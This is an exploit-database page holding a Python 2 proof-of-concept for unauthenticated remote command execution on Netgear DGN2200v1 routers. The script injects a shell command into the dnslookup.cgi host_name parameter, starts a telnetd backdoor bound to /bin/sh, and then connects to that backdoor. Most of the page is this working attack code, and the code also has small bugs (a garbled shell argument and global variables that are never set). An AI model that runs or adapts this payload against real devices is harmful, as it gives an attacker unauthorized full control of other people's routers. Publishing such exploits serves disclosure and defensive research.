Netgear DGN2200v1 Remote Command Execution

2021.07.07
Credit: SivertPL
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgear.com/ # Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL (kroppoloe@protonmail.ch) Date: 02.07.2021 Status: Patched in some models Version: All prior to v1.0.0.60 Impact: Critical CVE: No CVE number assigned PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 References: 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 The exploit script only works on UNIX-based systems. This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. """ import sys import requests import os target_ip = "192.168.0.1" telnet_port = 666 sent = False def main(): if len(sys.argv) < 3: print "./dgn2200_pwn.py <router ip> <backdoor-port>" exit() target_ip = sys.argv[1] telnet_port = int(sys.argv[2]) print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." send_payload() print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." print "[!] If it fails to connect it means the target is probably not vulnerable" spawn_shell() def send_payload(): try: requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") sent = True except Exception: sent = False print "[-] Unknown error, target might not be vulnerable." def spawn_shell(): if sent: print "[+] Dropping a shell..." os.system("telnet " + target_ip + " " + telnet_port) else: exit() if __name__ == "__main__": main()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top